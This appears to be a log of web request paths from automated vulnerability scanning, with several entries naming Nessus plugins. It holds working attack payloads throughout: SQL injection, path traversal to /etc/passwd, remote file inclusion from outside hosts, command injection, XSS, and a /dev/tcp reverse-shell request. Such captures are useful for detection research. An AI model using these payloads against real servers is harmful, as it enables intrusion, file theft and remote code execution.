/j4rdyhw8.fts? /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/djjeroppey.sh'); function v /scripts/ylrvly9nh_pf.inc /scripts/index.php?op=default&date=200607' union select 1,1100287420,1,1,1,1,1,1,1,1--&blogid=1 /scripts/vhost.php?action=logout&time=1331908735 /scripts/kfzqb5x87lvq.pl /newsletter_log.php?logfile=info.php&logtime=000060&email= /ao22ww7y.do? /javascript/globals.exe /b5xdqgz2.exe? /jw64yq8u.x? /scripts/gitweb.pl /main.php?logout='&del q16695623 # /scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331919202 /uvazfs7p.pl? /cgi-bin/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1 /examples/jsp/error/faq.php?action=&type=view&s=&id=-1' union select 0,157871866,0,0,0,0,0-- /top.php?stuff='\x0auname\x09>q23871271\x09# /manager/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- /javascript/subscription.exe /ju0u7kfo.asp? /manager/admin/addentry.php?phpbb_root_path=/etc/passwd\x00 /recordings/index.php?chemin=../../../../../../..//etc /en-us/account/home/search.asp?nchannel='1 /javascript/_vti_cnf.exe /0qhcnefz.aspx? /ssxmagazinesubscription/ /en-us/.dll /examples/servlets/servlet/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435 /examples/jsp/checkbox/newsscript.pl?mode=admin /en-us/ddoworrl.asp? /javascript/resolution.exe /examples/jsp/jsp2/jspx/include/sql.php?include_path=/etc/passwd\x00 /scripts/vzdybnanqpc3.inc /\x80../\x80../\x80../\x80../\x80../\x80../winnt/win.ini /fcgi-bin/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\ /cgis/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\ /javascript/programs.exe /help.php?q=&uname\x09>q82939622\x09# /t3af3tdz.dll? /scripts/index.php?board=nonexistant1419816536 /b5xdqgz2.php3? /bn857frh.aspx? /s7qus4g3.cfm? /scgi-bin/.htpasswd /phpmyadmin/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\x00 /en-us/account/a1stats/a1disp3.cgi?/../../../../../../etc/passwd /recordings/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd|| /dslpwt15.do? /mom's ass/ /javascript/1994.exe /scripts/qg9h0c0svvat.sh /606wkcop.kspx? /en-us/s7qus4g3.cfm? /vhzmaia2.cfm? /javascript/htpasswd.pl /main.php?stuff="&ping,-w,11000,-n,1,1.2.3.4&rem, /i2n4v4rl.htm? /postnuke/html/modules.php?op=modload&name=news&file=article&sid= /scripts/search.scr.php?globals[pth][classes]=http://cirt.net/rfiinc.txt?? /en-us/account/index.php?act=arcade&do=stats&gameid=1' /g8nu2yy7.kspx? /javascript/document.sfish /help.php?q="ping\xa0-w\xa08000\xa0-n\xa01\xa04.3.2.1&rem\xa0 /7dbjwpw6.nsf? /ny1b3qq4.x? /faq.php?action=&type=view&s=&id=-1' union select 0,1323875856,0,0,0,0,0-- /scs86g1p.cfc? /cgi-home/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd| /oncixdescription/ /en-us/oie504mr.x? /main.php?logout=&ping;-w;7000;-n;1;4.3.2.1&rem; /search.jsp?q=%" /scripts/man-cgi?section=0&topic=ls;id /xsskj3/ /main.php?stuff='\x0auname\x09>q47233887\x09# /examples/jsp/jsp2/el/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd /1r8cfrlf.kspx? /scripts/mensajeitor.php /passwdage/ /en-us/splunk_413_404error_xss.nasl-1331904921 /bl8sefdm.jspa? /banners.php?op=emailstats&cid=1 and passwd like 'a%'/* /script/ /scripts/breakcal/calendar.cgi /javascript/pipermail.exe /examples/jsp/checkbox/index.php?id='union/**/select/**/0,0,1364632458,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /bmeun223.cfm? /t3af3tdz.do? /yef5f3d5.jsp? /main.php?frm_daynight=day&frm_passwd=&frm_referer=q72116194&frm_user=&scr_height=&scr_width= /scripts/rot13sj.cgi?/etc/passwd /examples/jsp/jsp2/jspx/index.php?gadget=glossary&action=view&term= /main.php?stuff=";rm q85142671 # /ywaxntrx.jspa? /help.php?q="ver\xa0>q74458178&rem\xa0 / /eg2u8pbv.exe? /scripts/k0pxpjgnimox.php /phpmyadmin/way-board/way-board.cgi?db=/etc/passwd\x00 /cacti/gadgets/blog/blogmodel.php?path=/etc/passwd\x00 /en-us/n9xlumt5.html? /manager/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- /phpmyadminsearch_results.dot?search_query=nessus">/ /edit.jsp?page=user&editor=../../../install /bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd /examples/jsp/sessions/supporter/tupdate.php?groupid=change&sg=' /bemarket/postscript/postscript.php?p_mode=http://192.168.202.118:8080/moclyxlwqyfjnp? /scriptpath/footers.php?tinybb_footers=http://192.168.202.118:8080/zz5thkvtmlgl? /manager/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\x00gwextranet_template_dir_traversal.nasl /grey's anatomy 3x09 repack hdtv/ /en-us/i686v90l.do? /phpmyadmin/scripts/setup.php / /7dbjwpw6.idc? /addvip.php?msetstr["progsdir"]=http://192.168.202.96:8080/swgnhpydbq0t? /esmozg5d.dll? /javascript/property.exe /prescription-xanax/ /if69ddo1.php? /scripts/troops.cgi /javascript/win32.exe /javascript/compliance.exe /scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,403538393,1441170175,1,1,1,1,1--&blogid=1 /phpmyadmin/index.php?gadget=glossary&action=viewterm&term= /examples/jsp/sessions/index.php?template=../../../loudblog/custom/config.php\x00 /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908691&lang_crm=../../vtigerservice.php\x00 /main.php?stuff="&del\x0cq27346825&rem\x0c /9o6g5vkn.htm? /'stoked' gets to the heart of extreme athletics/ /0u75ldxq.php3? /examples/jsp/jsp2/jspx/config.php?path[docroot]=/etc/passwd\x00 /fmnveedu.idc? /help.php?q="&ping\x0c-w\x0c9000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c /javascript/pii.exe /javascript/ubb.exe /j4drbkil.idc? /examples/jsp/jsp2/jspx/index.php?show=/etc/passwd /1qwv2p5p.x? /scriptpath/footers.php?tinybb_footers=http://192.168.202.96:8080/ipb5ri? /main.php?stuff="&rm q23549573 # /script pack/ /rpxyx07v.dll? /pohentermine-prescription/ /eventum/forgot_password.php?email=\"> /ddoworrl.do? /megabook/admin.cgi?login= /initscripts/ /gazette-subscription/ /htbin/sensepost.exe?/c+dir /bmeun223.idc? /examples/jsp/jsp2/jspx/showcat.php?cat=1' /b5xdqgz2.idc? /examples/jsp/cal/index.php?entry=' /javascript/contents.exe /pirvate/ltwpdfmonth.php?ltw_config['include_dir]=http://192.168.202.118:8080/moclyxlwqyfjnp? /javascript/decl.exe /recordings/base_local_rules.php?dir= /ttxssh2_210/ /projects/1/repository/annotate?rev=`0<&208-;exec 208<>/dev/tcp/192.168.202.118/26475;sh <&208 >&208 2>&208` /en-us/7o5qp766.aspx? /main.php?logout=ver\x0c>q59849218&rem\x0c /scripts/secure.php?cfgprogdir=/etc/passwd\x00 /index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331908835',null,null,null,null -- /cgi.cgi/fileseek.cgi?foot=;cat /etc/passwd&head= /path_script/createurl.php?formurl=http://192.168.202.96:8080/swgnhpydbq0t? /index.php?op=default&date=200607' union select 1,1849014202,1,1,1,1,1,1,1,1--&blogid=1 /xnoscript/ /cacti/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\x00 /examples/servlets/servlet/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd /javascript/tuscany.exe /main.php?stuff=ver,>q65716768&rem, /zv8tv7h8.asp? /main.php?stuff="ping,-w,7000,-n,1,4.3.2.1|rem, /help.php?q="\x0duname >q75726259 # /v3axg1p8.idc? /top.php?stuff="ping\x0c-w\x0c10000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c /main.php?logout="del\x0cq37726783&rem\x0c /texis.exe/?-dump /launch.jsp?nfuse_application= /phpmyadmin/index.php/1' /examples/jsp/jsp2/el/index.php?configfile=../../../../../../../../../etc/passwd /javascript/.htaccess.sfish/''''"""" /en-us/9kr0ih0v.dll? /cgi-home/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|' /scripts/axdgpyi2bn6f.php3 /fcgi-bin/gwweb.exe?help=bad-request /top.php?stuff="&del\xa0q12371867&rem\xa0 /examples/jsp/checkbox/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_wfppkgt4]));die;/* /nyvbv05h.html? /cgi-bin/server.pt?open=space&name=";} /chat/register.php?register=yes&username=overg&email=&email1= /scripts/image.php?src=system/config/localconfig.php /archive.php?scriptpath=http://192.168.202.118:8080/2aibfaczmac8?? /..\xc1\xc1..\xc1\xc1..\xc1\xc1..\xc1\xc1..\xc1\xc1../winnt/system32/cmd.exe?/c+dir+c:\+/og /main.php?frm_daynight=q51426141&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php%3flogout%3d1&frm_user=&scr_height=&scr_width= /bzuf9ozq.mscgi? /boilerplate.asp?nfuse_template=../../boot.ini&nfuse_currentfolder=/sslx0020directories|-|0|404_object_not_found / /index.php?err=3&email=\"> /examples/jsp/num/admin/configset.php?settings_dir=/etc/passwd\x00 /cgi-bin/main.cgi?board=free_board&command=down_load&filename=../../../../../../../../../../etc/passwd /help.php?q="sleep\x097\x09# /ywaxntrx.aspx? /examples/jsp/jsp2/el/home/search.asp?nchannel='1 /moore's_law/ /cgi-perl/texis.exe/junk /scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331909370,1,1,1,1,1,1,1--&blogid=1 /claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\x00 /zqqemp6j.htm? /examples/jsp/num/remindpasswd /examples/jsp/colors/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h /main.php?stuff="\x0adel\x09q48139983\x09# /cgi-bin/fileseek2.cgi?head=;cat /etc/passwd|&foot= /examples/jsp/jsp2/jspx/index.php?string=' /javascript/info.exe /javascript/.passwd.pfx /scripts/index.php?include_files[]=&include_files[query_string]=/etc/passwd /tukodz3j.cgi? /awstats/awstats.pl?migrate=|echo;/bin/echo -en "vj\0001j\0002\0211\0341j\0001jfx\0133\0315\0200\0222" >> /tmp/ldlchhikup0;echo|awstats247374.txt /ows-bin/r.cgi?file=../../../../../../../../../../etc/passwd /jnt3f86c.kspx? /search.aspx?keywords= /en-us/jnv890lt.nsf? /main.php?stuff=;sleep 9 # /help.php?q='|sleep 8 # /examples/jsp/colors/cgiip.exe/wservice=wsbroker1/webutil/ping.p /cacti/htmlscript?../../../../../../../../../etc/passwd /help.php?q="&sleep\x099\x09# /cgi-bin/starnet/addons/slideshow_full.php?album_name='1731917543 /javascript/_source.exe /m4kkjf8l.aspx? /zln2hm2z.aspx? /help.php?q="&del q44114596 # /javascript/view.exe /cgi-bin/msmmask.exe?mask=/junk334 /recordings/index.php?search=&function=search /manager/web_store/web_store.cgi?page=../../../../../../etc/passwd\x00.html /top.php?stuff=ver\x09>q92179245&rem\x09 /jnt3f86c.php3? /scripts/printenv /javascript/www2.exe /top.php?stuff="\x0drm\x09q52865653\x09# /javascript/.passwd.bin /main.php?stuff="|ping,-w,8000,-n,1,1.2.3.4|rem, /top.php?stuff="\x0auname\x09>q52122221\x09# /item.fts?href=">; /cgis/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd /en-us/account/index.php?templates_dir=/etc/passwd\x00 /0rufe52p.idc? /cgi-home/fileseek2.cgi?foot=&head=;cat /etc/passwd| /en-us/n9xlumt5.dll? /cgi-bin/carbo.dll?icatcommand=..\..\..\..\..\..\winnt\win.ini&catalogname=catalog /v3axg1p8.nsf? /scripts/tomcat_proxy_directory_traversal.nasl1332009307 / /examples/jsp/error/wa.exe?debug-show-version /miz4r5hz.nsf? /fo564rei.php3? /evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331923203,1242183873 -- /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+a+1f4+>>ctdn /javascript/logo.exe /opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/frznctvhi0i5?\x00 /path_script/createurl.php?formurl=http://192.168.202.118:8080/tzhfyzkbomspvm? /cgi-bin/search.jsp?q=%" /examples/jsp/colors/search.php?submit=true&search='); /help.php?q="rm\x0cq65994111&rem\x0c /examples/jsp/sessions/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org /help.php?q="\x0dsleep\x097\x09# /administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.118:8080/zz5thkvtmlgl? /en-us/account/sendcard.php?view=1&id='sendcard_sql.nasl /de3v2dd9.html? /h5i6crm3.cgi? /cacti/index.php?mod_id=2&kb_ask= /javascript/.htpasswd.sfish/9-8 /o35zot2r.php? /javascript/jboss.exe /scripts/webnews.pl /javascript/dmsdump.exe /scripts/tsweb/ /scripts/search.jsp?q=%" /www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_6drqhnv_]));die;/* /b4vng02k.nsf? /javascript/survey.exe /moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;/tmp/xjmtpvepcz;" /j4oqyvga.php? /zroo33l4.dll? /main.php?logout="\x0drm q33212666 # /top.php?stuff="ver >q85581856&rem /main.php?logout=;sleep 7 # /main.inc.php?pathtoscript=@rfiurl /main.php?stuff="del,q26668686&rem, /manager/texis.exe/nessus /n1afe1y6.kspx? /w4996nr0.nsf? /examples/jsp/jsp2/jspx/shopper.cgi?newpage=../../../../../../etc/passwd /subscription-management/ /javascript/net.exe /main.php?logout="&ping\x0b-w\x0b11000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b /javascript/dba.exe /82q7ywa8.cfm? /u8yiqilu.kspx? /en-us/account/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e print "content-type: text/plain\x0d\x0a\x0d\x0a";system(id)&action=logout /javascript/jbossws.exe /help.php?q='rm q41634876 # /top.php?stuff="&sleep 8 # /javascript/trailers.exe /examples/jsp/jsp2/el/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1 /tothemaxss/ /examples/jsp/checkbox/ncbook/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /drhcprxk.exe|dir /examples/jsp/num/commerce.cgi?page=../../../../../etc/passwd\x00index.html /scripts/samples/search/qfullhit.htw /index.php?p=..\..\..\..\..\..\..\..\..\..\..\..\boot.ini\x00 /john battelle's searchblog/ /en-us/hipkz026.cfm? /w4996nr0.dll? /en-us/hipkz026.aspx? /modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script| /en-us/.php3 /hostadmin/?page=' /javascript/2009.exe /tocjscript1/ /recordings/forumdisplay.php?fid=21"> /d7ktpmcq.nsf? /scripts/1331904972-ror_session_fixation.nasl /u8yiqilu.do? /recordings/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\x00 /en-us/hipkz026.mscgi? /top.php?stuff="ver&rem\xa0 /main.php?stuff="|ping -w 9000 -n 1 4.3.2.1|rem /top.php?stuff='\x0adel\x09q23871271\x09# /main.php?stuff=";sleep\x098\x09# /moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;chmod+555+/tmp/ukirnkmpbn;" /en-us/.jspa /cgi-bin/index.php?op=default&date=200607' union select 1,1759684664,1,1,1,1,1,1,1,1--&blogid=1 /hjdzm96v.htm? /examples/jsp/colors/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc /en-us/account/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd /abouttrialsubscription/ /path_script/createurl.php?formurl=http://cirt.net/rfiinc.txt? /rv98iwjp.jsp? /examples/jsp/num/faq.php?action=&type=view&s=&id=-1' union select 0,1013365063,0,0,0,0,0-- /backupscript/ /fpnpp5zg.cgi? /m5103snj.exe? /? /javascript/get.exe /en-us/manager/launcher/apps/local?msgid=8839950.734222518743&ns=launcher&redirecting=true /cacti/bb_func_txt.php?pathtofiles=/etc/passwd\x00 /sysuser/docmgr/vchist.stm?path= /options.php?optpage= /mpgscript/ /cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1331909424,4--&blog=1 /examples/jsp/checkbox/kb.cgi?view='&lang=en /examples/jsp/jsp2/jspx/admin/addentry.php?phpbb_root_path=/etc/passwd\x00 /tomcat-docs/appdev/sample/web/hello.jsp?test= /admin/index.php?path_to_script=http://192.168.202.96:8080/4dckqcc0acprbz??&cmd=ls /_vti_bin/..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\+/og /rpc/..\xc1\xc1..\xc1\xc1..\xc1\xc1..\xc1\xc1..\xc1\xc1../winnt/system32/cmd.exe?/c+dir+c:\+/og /javascript/toggle.exe /javascript/f.exe /phpmyadmin/documentation.html?phpmyadmin=print(md5(acunetix_wvs_security_test));die();/* /recordings/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1 /cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file¤tfolder=/flkzzubocd.jsp\x00 /nyvbv05h.pl? /awstats/awstats.pl?migrate=|echo;/bin/echo -en "vj\0001j\0002\0211\0341j\0001jfx\0133\0315\0200\0222" >> /tmp/gjvtlghpjb0;echo|awstats360621.txt /vac1l5vm.idc? /manager/sources/functions.php?root_path=/etc/passwd\x00 /"france 24"/ /recordings/smpwservicescgi.exe /cgi-bin/snpfiltered.pl?t=c&u= /examples/jsp/num/index.php?id=urjhxcl19w' /prescript/ /javascript/cars.exe /manager/base_local_rules.php?dir= /javascript/document.war /scripts/sc877q2pzqne.shtml /phpmyadmin/demos/demo.browse.php?filename=/etc/passwd /vhzmaia2.php? /r3le3om5.pl? /hipkz026.exe? /cgi.cgi/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /.htpasswd /scripts/basilix.php /jsp-examples/cal/cal2.jsp?time=8am /j734qobz.idc? /bin/c32web.exe/getimage?imagename=customeremail.txt\x00.pdf /scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331905161 /9kr0ih0v.exe? /1r8cfrlf.php? /main.php?stuff=ping;-w;11000;-n;1;4.3.2.1|rem; /rubberstampsscriptalphabet/ /addvip.php?msetstr["progsdir"]=http://192.168.202.96:8080/llumt7msyau5y? /main.php?logout="rm\x0bq12574322&rem\x0b /i7prbs22.html? /scripts/wihphoto/start.php /weq93ppb.pl? /zln2hm2z.fts? /ghswfouu.jsp? /adodb/server.php?sql='adodb_sql_sql_injection.nasl /y8pmygrp.x? /top.php?stuff='uname >q24953383 # /manager/index.php?show=../../../../../../../../../../../etc/passwd\x00 /cgi-bin/prn/../../../../../../../../../winnt/system32/ipconfig.exe /help.php?q=;rm\x09q81281166\x09# /examples/jsp/checkbox/index.php?cat_select= /servlet/webacc?user.lang= /help.php?q="ping\x0c-w\x0c10000\x0c-n\x0c1\x0c4.3.2.1|rem\x0c /xfkun1ku.fts? /javascript/post.exe /en-us/oie504mr.cfm? /hrttz9fj.htm? /aj3pf49c.jspa? /javascript/htpasswd.c /copying/

/javascript/sl.exe /examples/jsp/jsp2/jspx/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id /javascript/.web.exe /zln2hm2z.htm? /ju0u7kfo.php3? /bmeun223.pl? /ht8pn8uq.dll? /help.php?q='\x0adel\x09q79344163\x09# /help.php?q="ping;-w;10000;-n;1;1.2.3.4|rem; /.../.../.../.../.../.../.../.../.../windows/win.ini /examples/servlets/servlet/starnet/addons/slideshow_full.php?album_name='1978429620 /vac1l5vm.php3? /javascript/presentations.exe /help.php?q="rm q92991511 # /xsqln7eb.php3? /script/ident/loginliste.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz? /33y9gcqq.x? /en-us/account/index.php?op=default&date=200607' union select 1,674790948,1,1,1,1,1,1,1,1--&blogid=1 /javascript/monitor.exe /scripts/h3d1n9eaqxv3.html /examples/jsp/jsp2/jspx/kernel/loadkernel.php?installpath=/etc/passwd\x00 /xssxmltest/ /help.php?q="&uname # /dslpwt15.php3? /examples/servlets/servlet/al_initialize.php?alpath=/etc/passwd\x00 /ao22ww7y.php3? /cacti/index.php?sensor_program= /7o5qp766.cfm? /main.php?logout="ver\xa0>q32937989&rem\xa0 /scripts/icat /6wb70v0b.html? /5qnlm5z2.jspa? /javascript/hipaa.exe /manager/faq.php?action=&type=view&s=&id=-1' union select 0,348320449,0,0,0,0,0-- /if69ddo1.mscgi? /scripts/faxsurvey?cat /etc/passwd /javascript/filez.exe /script_path/config.inc.php?_path=http://192.168.202.96:8080/4dckqcc0acprbz?? /en-us/account/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`; /scripts/file.php?path=/etc/passwd\x00 /6wb70v0b.mscgi? /iktok2bw.php3? /en-us/jnv890lt.cfc? /cgi-bin/index.php?search='>&searchmode=f /r3le3om5.cfm? /main.php?logout=';rm\x09q16263765\x09# /recordings/mmstdod.cgi?alternate_templates=| echo "content-type: text/html";echo "" ; id\x00 /main.php?stuff="\x0arm\x09q48139983\x09# /nigdyniewieszcomo\xbfeszzyska\xe6atakwieledostraceniajest:(/ /scripts/bveygnpo6hkw.pl /j4drbkil.fts? /javascript/gump.exe /.nsf /main.php?logout=;del\x09q38215685\x09# / /en-us/fo564rei.x? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+8b+ec+50+60+6a+04+5a+50+8b+dc+e8+41+00+00+00+6a+00+68+6c+6c+6f+63+68+75+61++>>ctdn / /javascript/definition.exe /nyvbv05h.x? /en-us/account/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\x00 /help.php?q='\x0adel q19373947 # /javascript/rhtml.exe /t7tm4m0b.dll? /cacti/base_local_rules.php?dir= /roads/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd\x00 /javascript/document.gz /addvip.php?msetstr["progsdir"]=http://192.168.202.96:8080/txenjrxf3? /javascript/assets.exe /fo564rei.mscgi? /cgi-bin/index.php?id='union/**/select/**/0,0,763560836,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /zmvq66jy.nsf? /javascript/space.exe /edzaia0i.dll? /examples/jsp/num/index.php?site=../../../../../../../../etc/passwd\x00 /jw64yq8u.cfm? /cgi-bin/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd|| /examples/jsp/error/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /iktok2bw.pl? /eei78ore.x? /phpmyadmin/documentation.html?phpmyadmin=&cat /etc/passwd& /....\....\....\....\....\....\....\....\....\windows\win.ini /mpcgi/sensepost.exe?/c+dir /cgi-bin/visitor.exe /scripts/rx9ysf2iwv4j.pl /7u1pb2xi.htm? /scripts/blog/mt-check.cgi /scripts/zq9frlz6fcfp.php3 /cgi-bin/index.php?act=arcade&do=stats&gameid=1' /cgi-bin/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl /bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd /phpmyadmin/includes/converter.inc.php?include_path=/etc/passwd\x00 /scripts/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13-- /scripts/2sfdqydfaknx.pl /help.php?q="&rm;q83399542&rem; /scripts/bpk_bsfe_4vq.sh /8t9v8k7x.nsf? //..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd /pma/db_details_importdocsql.php?submit_show=true&do=import&docpath=../ /t7tm4m0b.fts? /weq93ppb.htm? /scripts/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\x00 /javascript/devel.exe /login/sm_login_screen.php?uid=\"> /cgi-sys/c32web.exe/changeadminpassword /cgis/ion-p?page=../../../../../etc/passwd /en-us/i686v90l.cgi? /javascript/maps.exe /recordingsmultihtml.pl?multi=/etc/passwd\x00html /index.php?config["sipssys"]=http://192.168.202.118:8080/ghl9il? /g8nu2yy7.html? /jnt3f86c.php? /examples/jsp/sessions/search.cgi?..\..\..\..\..\..\winnt\win.ini /en-us/account/review.php?id=1&cat=&subcat="> /a.jsp/ /script//ident/index.php?path_inc=http://192.168.202.118:8080/ghl9il? /33y9gcqq.idc? /main.php?stuff="\x0auname >q72652917 # /comments.php?scriptpath=http://192.168.202.118:8080/moclyxlwqyfjnp?? /javascript/.passwd.orig /v3axg1p8.dll? /subscriptions.orig /1r8cfrlf.asp? /5o9zq43e.jspa? /scripts/mail.php?id='/**/union/**/select/**/1,2,1331909424,4--&blog=1 /examples/jsp/num/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13-- /examples/jsp/num/backend/classes.php?include_path=../lib/jinzora.js\x00 /h4bi26jd.x? /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\x00 /pbserver/..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\+/og /cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904220&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /? /fc9t54l7.cgi? /3hlysl2x.fts? /qczkquis.pl? /static//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd /scripts/check-lom.php?etcdir=http://192.168.202.118:8080/zz5thkvtmlgl? /examples/servlets/servlet/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\x00 /index.php?entry=' /scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1332008332,1,1,1,1,1,1,1--&blogid=1 /comments.php?scriptpath=http://192.168.202.96:8080/no4ghqiguzhst?? /fmnveedu.jspa? /script/template/index.php?main_page_directory=http://192.168.202.96:8080/4dckqcc0acprbz? /mysubscription/ /examples/servlets/servlet/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00 /scripts/buoalakxhatu.cgi /tuwjta1w.kspx? /phpmyadmin/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\x00 /r3le3om5.kspx? /javascript/title.exe /ju0u7kfo.jspa? /scripts/t769qwej0llr.php /hipkz026.php3? /default.php?error_message= /scripts/nffhikq061nq.php /top.php?stuff="rm;q48162266&rem; /ows-bin/.passwd /6dlc2zm9.asp? /javascript/.htpasswd.sfish /javascript/en.exe /examples/jsp/num/ion-p.exe?page=c:\\winnt\\win.ini /en-us/account/a1disp3.cgi?/../../../../../../etc/passwd /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+33+c9+51+52+53+ff+75+00+ff+54+05+04+85+c0+7e+01+c3+68+61+64+00+00+68+54+68++>>esbq /top.php?stuff="ping,-w,7000,-n,1,4.3.2.1|rem, /1qwv2p5p.php? /javascript/error-log.exe /scripts/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd /javascript/document.bin /zuihld5m.php? /phpmyadmin/index.php?entry=' /examples/jsp/sessions/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00 /m2fpztty.php3? /bmeun223.kspx? /main.php?stuff=ping;-w;7000;-n;1;1.2.3.4&rem; /scripts/htsearch.cgi /gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd /scriptcon/ /m2fpztty.dll? /phpmyadmin/sql.php?server=000&cfgservers[000][host]=hello&btndrop=no&goto=/etc/passwd /ao22ww7y.html? /examples/jsp/jsp2/jspx/backend/classes.php?include_path=../lib/jinzora.js\x00 /d765w06j.do? /fastscripts2/ /j4drbkil.exe? /ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st=' /admin/htmlarea/popups/file/files.php?q=&mode=apparel /bl8sefdm.cgi? /javascript/mlist.exe /scripts/samples/search/filetime.idq /hjdzm96v.dll? /javascript/index1.exe /javascript/low.exe /lsoix5h3.cfm? /jackrabbit/search.jsp?q=%" /help.php?q="&del,q66241785&rem, /8t9v8k7x.php? /scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331923197',null,null,null,null -- /cgi-sys/msmmask.exe?mask=/junk334 /fpnpp5zg.fts? /phpmyadmin/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\x00 /9o6g5vkn.exe? /y8pmygrp.cgi? / /javascript/fuckoff.exe /opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/vir0v3xfc?\x00 /g8nu2yy7.dll? /javascript/sws.exe /javascript/console.exe /nyvbv05h.mscgi? /quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\x00html /javascript/updater.exe /examples/jsp/num/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\x00 